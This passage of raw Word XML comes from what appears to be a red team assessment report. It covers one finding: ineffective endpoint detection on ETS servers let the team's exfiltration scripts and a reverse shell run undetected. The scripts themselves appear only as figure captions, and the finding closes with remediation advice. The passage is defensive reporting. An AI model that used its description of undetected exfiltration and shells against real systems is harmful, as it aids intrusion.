        <w:spacing w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5539094B" w14:textId="522813BC" w:rsidR="00057EEA" w:rsidRPr="001019D3" w:rsidRDefault="0026176B" w:rsidP="00057EEA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:pageBreakBefore/>
        <w:ind w:left="734" w:hanging="734"/>
      </w:pPr>
      <w:bookmarkStart w:id="194" w:name="_Toc213253572"/>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Inef</w:t>
      </w:r>
      <w:r w:rsidR="00057EEA" w:rsidRPr="001019D3">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">fective </w:t>
      </w:r>
      <w:r w:rsidR="006F5C7A" w:rsidRPr="001019D3">
        <w:t>Endpoint Detection and Response (</w:t>
      </w:r>
      <w:r w:rsidR="00057EEA" w:rsidRPr="001019D3">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>EDR</w:t>
      </w:r>
      <w:r w:rsidR="006F5C7A" w:rsidRPr="001019D3">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00057EEA" w:rsidRPr="001019D3">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="190"/>
      <w:bookmarkEnd w:id="191"/>
      <w:r w:rsidR="00526786" w:rsidRPr="001019D3">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>allows malicious actions to go unnoticed</w:t>
      </w:r>
      <w:bookmarkEnd w:id="194"/>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416"/>
        <w:gridCol w:w="1914"/>
        <w:gridCol w:w="3106"/>
      </w:tblGrid>
      <w:tr w:rsidR="00324472" w:rsidRPr="001019D3" w14:paraId="2031FA69" w14:textId="77777777" w:rsidTr="0026176B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38E4BCC1" w14:textId="77777777" w:rsidR="00324472" w:rsidRPr="001019D3" w:rsidRDefault="00324472" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Rating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1382" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A29F8A1" w14:textId="77777777" w:rsidR="00324472" w:rsidRPr="001019D3" w:rsidRDefault="00324472" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Impacted assets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2872" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7733FB06" w14:textId="77777777" w:rsidR="00324472" w:rsidRPr="001019D3" w:rsidRDefault="00324472" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ATT&amp;CK MITRE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324472" w:rsidRPr="001019D3" w14:paraId="42AEC048" w14:textId="77777777" w:rsidTr="00334A66">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="386050E8" w14:textId="18EDCF9E" w:rsidR="00324472" w:rsidRPr="001019D3" w:rsidRDefault="00334A66" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1382" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="620CA80D" w14:textId="6F7A4B3E" w:rsidR="00324472" w:rsidRPr="001019D3" w:rsidRDefault="0026176B" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ETS</w:t>
            </w:r>
            <w:r w:rsidR="0055647E" w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00AB59D9" w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidR="0055647E" w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ervers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1095" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1A97D769" w14:textId="27C791C7" w:rsidR="00324472" w:rsidRPr="001019D3" w:rsidRDefault="00324472" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA-</w:t>
            </w:r>
            <w:r w:rsidR="0080139A" w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0005</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E2FA512" w14:textId="2EEC32F3" w:rsidR="00324472" w:rsidRPr="001019D3" w:rsidRDefault="0080139A" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>Defence Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1777" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="14DC79C9" w14:textId="5C5DF851" w:rsidR="00324472" w:rsidRPr="001019D3" w:rsidRDefault="00324472" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:r w:rsidR="0080139A" w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1562</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6938CA1E" w14:textId="4F86A7F0" w:rsidR="00324472" w:rsidRPr="001019D3" w:rsidRDefault="0080139A" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Impair Defences</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1540502E" w14:textId="0601B9F0" w:rsidR="00324472" w:rsidRPr="001019D3" w:rsidRDefault="00324472" w:rsidP="0026176B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31757AF8" w14:textId="437EC0CD" w:rsidR="00993EB0" w:rsidRPr="001019D3" w:rsidRDefault="00645995" w:rsidP="0026176B">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xml:space="preserve">), </w:t>
      </w:r>
      <w:r w:rsidR="00993EB0" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">the Red Team noticed that </w:t>
      </w:r>
      <w:r w:rsidR="0026176B" w:rsidRPr="001019D3">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00324472" w:rsidRPr="001019D3">
        <w:t>o effective E</w:t>
      </w:r>
      <w:r w:rsidR="0026176B" w:rsidRPr="001019D3">
        <w:t>ndpoint Detection and Response (E</w:t>
      </w:r>
      <w:r w:rsidR="00324472" w:rsidRPr="001019D3">
        <w:t>DR</w:t>
      </w:r>
      <w:r w:rsidR="0026176B" w:rsidRPr="001019D3">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00324472" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> software was running on the system</w:t>
      </w:r>
      <w:r w:rsidR="0026176B" w:rsidRPr="001019D3">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00324472" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56089174" w14:textId="32599352" w:rsidR="00324472" w:rsidRPr="001019D3" w:rsidRDefault="00324472" w:rsidP="0026176B">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>As a result, the system could become infected with malware, or an attacker could place malicious software on the system</w:t>
      </w:r>
      <w:r w:rsidR="0026176B" w:rsidRPr="001019D3">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> for further attacks against the network or end users or attempt to exfiltrate data undetected. It is worth noting that Linux viruses are uncommon; however, EDR software is useful to protect end users and </w:t>
      </w:r>
      <w:r w:rsidR="0080139A" w:rsidRPr="001019D3">
        <w:t>servers and</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> can also help detect and prevent various forms of malicious techniques, such as rootkits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F44F129" w14:textId="7D7DBB9D" w:rsidR="0026176B" w:rsidRPr="001019D3" w:rsidRDefault="0026176B" w:rsidP="0026176B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDB5FD4" w14:textId="21C0F751" w:rsidR="00324472" w:rsidRPr="001019D3" w:rsidRDefault="00324472" w:rsidP="0026176B">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">The Red Team </w:t>
      </w:r>
      <w:r w:rsidR="0026176B" w:rsidRPr="001019D3">
        <w:t>developed</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> scripts during the </w:t>
      </w:r>
      <w:r w:rsidR="0026176B" w:rsidRPr="001019D3">
        <w:t>campaign</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> that allow to automate several actions </w:t>
      </w:r>
      <w:r w:rsidR="0026176B" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">such as </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>enumerate the environment further and also to exfiltrate data from affected hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79417C8F" w14:textId="77777777" w:rsidR="0080139A" w:rsidRPr="001019D3" w:rsidRDefault="0080139A" w:rsidP="0026176B">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="316A6FDA" wp14:editId="24F68709">
            <wp:extent cx="5537200" cy="1966002"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="41931814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18144" name="Picture 4" descr="A screen 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545712" cy="1969024"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3587D21D" w14:textId="410F3DC3" w:rsidR="0080139A" w:rsidRPr="001019D3" w:rsidRDefault="0080139A" w:rsidP="0026176B">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="195" w:name="_Toc213253802"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0026176B" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Script for </w:t>
      </w:r>
      <w:r w:rsidR="0026176B" w:rsidRPr="001019D3">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">ata </w:t>
      </w:r>
      <w:r w:rsidR="0026176B" w:rsidRPr="001019D3">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>xfiltration</w:t>
      </w:r>
      <w:r w:rsidR="0026176B" w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="195"/>
    </w:p>
    <w:p w14:paraId="03CD334B" w14:textId="4869710F" w:rsidR="00324472" w:rsidRPr="001019D3" w:rsidRDefault="0026176B" w:rsidP="00A550F8">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">The fact that no detection </w:t>
      </w:r>
      <w:r w:rsidR="00A550F8" w:rsidRPr="001019D3">
        <w:t>was</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>raised</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> or the scripts were blocked </w:t>
      </w:r>
      <w:r w:rsidR="00324472" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">demonstrates that no effective real-time scanning was enabled. </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>In</w:t>
      </w:r>
      <w:r w:rsidR="00324472" w:rsidRPr="001019D3">
        <w:t>effective EDR product</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00324472" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> could aid the propagation of malware across systems, and for malicious actions to go undetected for a long period of time. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8F7414" w14:textId="0EF62114" w:rsidR="00091689" w:rsidRPr="001019D3" w:rsidRDefault="00091689" w:rsidP="00A550F8">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Another indication that the EDR was not effective was that it was possible to establish a</w:t>
      </w:r>
      <w:r w:rsidR="0026176B" w:rsidRPr="001019D3">
        <w:t>n SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> bind connection </w:t>
      </w:r>
      <w:r w:rsidR="009D38DD" w:rsidRPr="001019D3">
        <w:t>from</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> the compromised server</w:t>
      </w:r>
      <w:r w:rsidR="0026176B" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> (see</w:t>
      </w:r>
      <w:r w:rsidR="00412AA9" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00412AA9" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00412AA9" w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref213161042 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00412AA9" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>4.3.2</w:t>
      </w:r>
      <w:r w:rsidR="00412AA9" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0026176B" w:rsidRPr="001019D3">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>. A</w:t>
      </w:r>
      <w:r w:rsidR="009D38DD" w:rsidRPr="001019D3">
        <w:t>n effective EDR would have send alerts and block such processes to run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB60AF1" w14:textId="130F5316" w:rsidR="008B7B09" w:rsidRPr="001019D3" w:rsidRDefault="00F974FA" w:rsidP="00AC72B3">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DF33886" wp14:editId="1A966719">
            <wp:extent cx="5543550" cy="1782445"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="174263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34587" name="Picture 2"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="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5543550" cy="1782445"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EB85C8" w14:textId="7CD1D2E2" w:rsidR="008B7B09" w:rsidRPr="001019D3" w:rsidRDefault="008B7B09" w:rsidP="00AC72B3">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="196" w:name="_Toc213253803"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="009D38DD" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">: EDR did not detect a </w:t>
      </w:r>
      <w:r w:rsidR="00F974FA" w:rsidRPr="001019D3">
        <w:t>reverse</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F974FA" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> and commands executed on the server</w:t>
      </w:r>
      <w:r w:rsidR="009D38DD" w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="196"/>
    </w:p>
    <w:p w14:paraId="73C37DD7" w14:textId="38734116" w:rsidR="008B7B09" w:rsidRPr="001019D3" w:rsidRDefault="008B7B09" w:rsidP="008B7B09">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Screen clipping taken: 10/07/2025 2:42 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2F1674" w14:textId="088FF66E" w:rsidR="009D38DD" w:rsidRPr="001019D3" w:rsidRDefault="009D38DD" w:rsidP="00D95F69">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">The list of servers </w:t>
      </w:r>
      <w:r w:rsidR="00A550F8" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">that do not contain effective EDRs </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>can be found in annex</w:t>
      </w:r>
      <w:r w:rsidR="00526786" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00526786" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00526786" w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref213159717 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00526786" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>5.2.6</w:t>
      </w:r>
      <w:r w:rsidR="00526786" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD10844" w14:textId="3C23D84A" w:rsidR="00324472" w:rsidRPr="001019D3" w:rsidRDefault="00324472" w:rsidP="00A550F8">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Recommendation</w:t>
      </w:r>
      <w:r w:rsidR="00A550F8" w:rsidRPr="001019D3">
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1414D25E" w14:textId="30EDA015" w:rsidR="00A550F8" w:rsidRPr="001019D3" w:rsidRDefault="00324472" w:rsidP="00503324">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Ensure that a suitable and effective EDR product </w:t>
      </w:r>
      <w:r w:rsidR="00A550F8" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">is installed on all </w:t>
      </w:r>
      <w:r w:rsidR="009E5C13" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">ETS </w:t>
      </w:r>
      <w:r w:rsidR="00A550F8" w:rsidRPr="001019D3">
        <w:t>systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3307D530" w14:textId="4F4D374E" w:rsidR="00A550F8" w:rsidRPr="001019D3" w:rsidRDefault="00A550F8" w:rsidP="00503324">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Continuously test effectiveness of the EDR solution </w:t>
      </w:r>
      <w:r w:rsidR="009E5C13" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">installed on ETS servers </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">by performing </w:t>
      </w:r>
      <w:r w:rsidR="0083689F" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">tests such as </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>Red Team exercises.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E79ECA" w14:textId="17C3AD50" w:rsidR="0020401E" w:rsidRPr="001019D3" w:rsidRDefault="0020401E">
      <w:r w:rsidRPr="001019D3">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D63A04" w14:textId="3CF83C84" w:rsidR="00B44CC1" w:rsidRPr="001019D3" w:rsidRDefault="00B44CC1" w:rsidP="00B44CC1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:pageBreakBefore/>
        <w:ind w:left="734" w:hanging="734"/>
      </w:pPr>
      <w:bookmarkStart w:id="197" w:name="_Toc212654667"/>
      <w:bookmarkStart w:id="198" w:name="_Ref213100273"/>
      <w:bookmarkStart w:id="199" w:name="_Toc213253573"/>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Use of </w:t>
      </w:r>
      <w:r w:rsidR="00BA2F3A" w:rsidRPr="001019D3">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>igh-</w:t>
      </w:r>
